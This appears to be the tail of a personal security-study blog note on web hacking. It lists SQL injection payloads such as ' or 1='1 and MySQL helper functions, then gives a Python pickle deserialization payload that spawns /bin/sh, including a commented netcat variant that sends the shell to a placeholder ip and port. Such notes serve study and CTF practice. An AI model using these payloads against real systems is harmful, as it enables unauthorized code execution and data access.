<span class="n">user_input</span><span class="o">=</span><span class="nv">"' or 1='1"</span> <span class="o">=&gt;</span> <span class="k">Select</span> <span class="o">*</span> <span class="k">from</span> <span class="n">tbl</span> <span class="k">where</span> <span class="n">id</span><span class="o">=</span><span class="s1">''</span> <span class="k">or</span> <span class="mi">1</span><span class="o">=</span><span class="s1">'1'</span>
</code></pre></div></div>

<p><strong>3. and, or, &amp;&amp;, ||, in, between, like</strong></p>
<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">-- and, or</span>
<span class="k">Select</span> <span class="o">*</span> <span class="k">from</span> <span class="n">tbl</span> <span class="k">where</span> <span class="n">id</span><span class="o">=</span><span class="s1">'1234'</span> <span class="k">and</span> <span class="n">pw</span><span class="o">=</span><span class="s1">'5678'</span>
<span class="k">Select</span> <span class="o">*</span> <span class="k">from</span> <span class="n">tbl</span> <span class="k">where</span> <span class="n">id</span><span class="o">=</span><span class="s1">'1234'</span> <span class="k">or</span> <span class="n">pw</span><span class="o">=</span><span class="s1">'5678'</span>

<span class="c1">-- &amp;&amp;, || (no space required)</span>
<span class="k">Select</span> <span class="o">*</span> <span class="k">from</span> <span class="n">tbl</span> <span class="k">where</span> <span class="n">id</span><span class="o">=</span><span class="s1">'1234'</span><span class="o">&amp;&amp;</span><span class="n">pw</span><span class="o">=</span><span class="s1">'5678'</span>
<span class="k">Select</span> <span class="o">*</span> <span class="k">from</span> <span class="n">tbl</span> <span class="k">where</span> <span class="n">id</span><span class="o">=</span><span class="s1">'1234'</span><span class="o">||</span><span class="n">pw</span><span class="o">=</span><span class="s1">'5678'</span>

<span class="c1">-- in</span>
<span class="k">Select</span> <span class="o">*</span> <span class="k">from</span> <span class="n">tbl</span> <span class="k">where</span> <span class="n">id</span> <span class="k">in</span> <span class="s1">'1234'</span> <span class="k">and</span> <span class="n">pw</span> <span class="k">in</span> <span class="s1">'5678'</span>

<span class="c1">-- between and (both number and char are possible)</span>
<span class="k">Select</span> <span class="o">*</span> <span class="k">from</span> <span class="n">tbl</span> <span class="k">where</span> <span class="n">age</span> <span class="k">between</span> <span class="mi">20</span> <span class="k">and</span> <span class="mi">30</span> <span class="c1">-- 20&lt;=age&lt;=30</span>
<span class="k">Select</span> <span class="o">*</span> <span class="k">from</span> <span class="n">tbl</span> <span class="k">where</span> <span class="n">score</span> <span class="k">between</span> <span class="s1">'A'</span> <span class="k">and</span> <span class="s1">'C'</span> <span class="c1">-- 'A'&lt;=score&lt;='C'</span>

<span class="c1">--like (starts with ~, ends with ~, include ~, length)</span>
<span class="k">Select</span> <span class="o">*</span> <span class="k">from</span> <span class="n">tbl</span> <span class="k">where</span> <span class="n">name</span> <span class="k">like</span> <span class="s1">'Bae%'</span> <span class="c1">-- starts with Bae</span>
<span class="k">Select</span> <span class="o">*</span> <span class="k">from</span> <span class="n">tbl</span> <span class="k">where</span> <span class="n">name</span> <span class="k">like</span> <span class="s1">'%uk'</span> <span class="c1">-- ends with uk</span>
<span class="k">Select</span> <span class="o">*</span> <span class="k">from</span> <span class="n">tbl</span> <span class="k">where</span> <span class="n">name</span> <span class="k">like</span> <span class="s1">'%won%'</span> <span class="c1">-- include won</span>
<span class="k">Select</span> <span class="o">*</span> <span class="k">from</span> <span class="n">tbl</span> <span class="k">where</span> <span class="n">name</span> <span class="k">like</span> <span class="s1">'___'</span> <span class="c1">-- length 3 chars</span>
<span class="k">Select</span> <span class="o">*</span> <span class="k">from</span> <span class="n">tbl</span> <span class="k">where</span> <span class="nb">binary</span> <span class="n">name</span> <span class="k">like</span> <span class="s1">'~'</span> <span class="c1">-- distinguish upper/lower</span>
</code></pre></div></div>

<p><strong>4. Internal function in mysql</strong></p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">char(...)</code> : change integer arguments to char (ex. <code class="language-plaintext highlighter-rouge">char(0x61,0x62,0x63)</code>=&gt;<code class="language-plaintext highlighter-rouge">"abc"</code>)</li>
  <li><code class="language-plaintext highlighter-rouge">mid/substr[ing](a,b,c)</code> : get <code class="language-plaintext highlighter-rouge">c</code> bytes in <code class="language-plaintext highlighter-rouge">a</code> from <code class="language-plaintext highlighter-rouge">b(starts from 1 ~ ..)</code></li>
  <li><code class="language-plaintext highlighter-rouge">left(a,b)</code> / <code class="language-plaintext highlighter-rouge">right(a,b)</code> : get <code class="language-plaintext highlighter-rouge">b</code> bytes in <code class="language-plaintext highlighter-rouge">a</code> (begin / end(reverse but print correctly))</li>
  <li><code class="language-plaintext highlighter-rouge">version()</code> : get mysql version</li>
  <li><code class="language-plaintext highlighter-rouge">database()</code> : get current database</li>
</ul>

<p><br /></p>

<h2 id="python-pickle-deserialization">python pickle deserialization</h2>
<p><code class="language-plaintext highlighter-rouge">pickle</code>로 직렬화된 객체가 변조되어 역직렬화하는 과정에서 시스템에 접근하거나 의도치 않은 것이 실행되기도 한다. 원하는 class를 선언한 뒤, <code class="language-plaintext highlighter-rouge">__reduce__</code>를 통하여 <code class="language-plaintext highlighter-rouge">pickle.loads</code> 함수에서 unpickle 시 <code class="language-plaintext highlighter-rouge">tuple</code>을 반환하여 함수를 실행시킬 수 있다.</p>

<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="n">os</span>
<span class="kn">import</span> <span class="n">pickle</span>

<span class="k">class</span> <span class="nc">payload</span><span class="p">(</span><span class="nb">object</span><span class="p">):</span>
  <span class="k">def</span> <span class="nf">__reduce__</span><span class="p">(</span><span class="n">self</span><span class="p">):</span>
    <span class="c1">#return (os.system, ('ls', ))
</span>    <span class="c1">#return (os.system, ('cat flag', ))
</span>    <span class="nf">return </span><span class="p">(</span><span class="n">os</span><span class="p">.</span><span class="n">system</span><span class="p">,</span> <span class="p">(</span><span class="sh">'</span><span class="s">/bin/sh</span><span class="sh">'</span><span class="p">,</span> <span class="p">))</span>
    <span class="c1">#return (os.system, ('/bin/sh | nc [ip] [port]', ))
</span>
<span class="n">pickle_d</span><span class="o">=</span><span class="n">pickle</span><span class="p">.</span><span class="nf">dumps</span><span class="p">(</span><span class="nf">payload</span><span class="p">())</span>
<span class="n">pickle</span><span class="p">.</span><span class="nf">loads</span><span class="p">(</span><span class="n">pickle_d</span><span class="p">)</span> <span class="c1"># get shell anyway
</span></code></pre></div></div>
<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="err">$</span> <span class="nb">id</span>
<span class="n">uid</span><span class="o">=</span><span class="mi">1000</span><span class="p">(</span><span class="n">test</span><span class="p">)</span> <span class="n">gid</span><span class="o">=</span><span class="mi">1000</span><span class="p">(</span><span class="n">test</span><span class="p">)</span> <span class="n">groups</span><span class="o">=</span><span class="mi">1000</span><span class="p">(</span><span class="n">test</span><span class="p">)</span>
</code></pre></div></div>

<p>update 예정.</p>

        
      </section>

      <footer class="page__meta">
        
        


  


  

  <p class="page__taxonomy">
    <strong><i class="fas fa-fw fa-folder-open" aria-hidden="true"></i> Categories: </strong>
    <span itemprop="keywords">
    
      <a href="/categories/#note" class="page__taxonomy-item p-category" rel="tag">note</a>
    
    </span>
  </p>


        

  <p class="page__date"><strong><i class="fas fa-fw fa-calendar-alt" aria-hidden="true"></i> Updated:</strong> <time class="dt-published" datetime="2021-10-27T10:00:00+09:00">October 27, 2021</time></p>

      </footer>

      <section class="page__share">
  
    <h4 class="page__share-title">Share on</h4>
  

  <a href="https://twitter.com/intent/tweet?text=web+note+%28update+2021.10.27%29%20http%3A%2F%2Flocalhost%3A4000%2Fnote%2Fweb-note-update%2F" class="btn btn--twitter" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Twitter"><i class="fab fa-fw fa-twitter" aria-hidden="true"></i><span> Twitter</span></a>

  <a href="https://www.facebook.com/sharer/sharer.php?u=http%3A%2F%2Flocalhost%3A4000%2Fnote%2Fweb-note-update%2F" class="btn btn--facebook" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Facebook"><i class="fab fa-fw fa-facebook" aria-hidden="true"></i><span> Facebook</span></a>

  <a href="https://www.linkedin.com/shareArticle?mini=true&url=http://localhost:4000/note/web-note-update/" class="btn btn--linkedin" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on LinkedIn"><i class="fab fa-fw fa-linkedin" aria-hidden="true"></i><span> LinkedIn</span></a>
</section>


      
  <nav class="pagination">
    
      <a href="/life/start-again/" class="pagination--pager" title="Start Again
">Previous</a>
    
    
      <a href="/life/list-after-graduate/" class="pagination--pager" title="Personal R&amp;D plan beginning from ‘now’
">Next</a>
    
  </nav>

    </div>

    
  </article>

  
  
    
<div class="page__related">
  
  <h2 class="page__related-title">You may also enjoy</h2>
  <div class="grid__wrapper">
    
      
      



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/ctf/htb_businessctf_2022/" rel="permalink">HTB Business CTF 2022 : Dirty Money write-up (in progress)
</a>
      
    </h2>
    

  <p class="page__meta">
    

    

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          5 minute read
        
      </span>
    
  </p>


    <p class="archive__item-excerpt" itemprop="description">Write-up IN PROGRESS ..
작성중

Summary
Solved 3 pwn (including windows kernel exploitation), 3 crypto, 2 rev, 1 forensic. pwn focused on FSB attack or ezpz ker...</p>
  </article>
</div>

    
      
      



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/v8/V8-introduction/" rel="permalink">[V8 Study] 00-introduction
</a>
      
    </h2>
    

  <p class="page__meta">
    

    

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          2 minute read
        
      </span>
    
  </p>


    <p class="archive__item-excerpt" itemprop="description">[!] 우선적으로 한글로 작성하여 추후 번역할 예정.

Summary
우리가 대중적으로 사용하는 Google Chrome browser에는 웹페이지를 동적으로 실행시키기 위해 javascript가 구동될 수 있도록 지원하고 있다. 그렇다면, JS를 원활하게 실행하고 컴파일하는 역할...</p>
  </article>
</div>

    
      
      



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/life/list-after-graduate/" rel="permalink">Personal R&amp;D plan beginning from ‘now’
</a>
      
    </h2>
    

  <p class="page__meta">
    

    

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          less than 1 minute read
        
      </span>
    
  </p>


    <p class="archive__item-excerpt" itemprop="description">UPDATED : 06 JUN 2023 19:45 UTC+9 KST

This is my plan to be finished until/after graduating.

Research

  § must be finished until new year’s day §
  
    K...</p>
  </article>
</div>

    
      
      



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
        <a href="/life/start-again/" rel="permalink">Start Again
</a>
      
    </h2>
    

  <p class="page__meta">
    

    

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          less than 1 minute read
        
      </span>
    
  </p>


    <p class="archive__item-excerpt" itemprop="description">Start for 4th Blog
</p>
  </article>
</div>

    
  </div>
</div>

  
  
</div>

      
    </div>

    
      <div class="search-content">
        <div class="search-content__inner-wrap"><form class="search-content__form" onkeydown="return event.key != 'Enter';" role="search">
    <label class="sr-only" for="search">
      Enter your search term...
    </label>
    <input type="search" id="search" class="search-input" tabindex="-1" placeholder="Enter your search term..." />
  </form>
  <div id="results" class="results"></div></div>

      </div>
    

    <div id="footer" class="page__footer">
      <footer>
        <!-- start custom footer snippets -->

<!-- end custom footer snippets -->
        <div class="page__footer-follow">
  <ul class="social-icons">
    
      <li><strong>Follow:</strong></li>
    

    
      
        
      
        
      
        
      
        
      
        
      
        
      
    

    
      <li><a href="/feed.xml"><i class="fas fa-fw fa-rss-square" aria-hidden="true"></i> Feed</a></li>
    
  </ul>
</div>

<div class="page__footer-copyright">&copy; 2024 <a href="http://localhost:4000">st4rlight</a>. Powered by <a href="https://jekyllrb.com" rel="nofollow">Jekyll</a> &amp; <a href="https://mademistakes.com/work/minimal-mistakes-jekyll-theme/" rel="nofollow">Minimal Mistakes</a>.</div>

      </footer>
    </div>

    
  <script src="/assets/js/main.min.js"></script>




<script src="/assets/js/lunr/lunr.min.js"></script>
<script src="/assets/js/lunr/lunr-store.js"></script>
<script src="/assets/js/lunr/lunr-en.js"></script>




    

  




  </body>
</html>
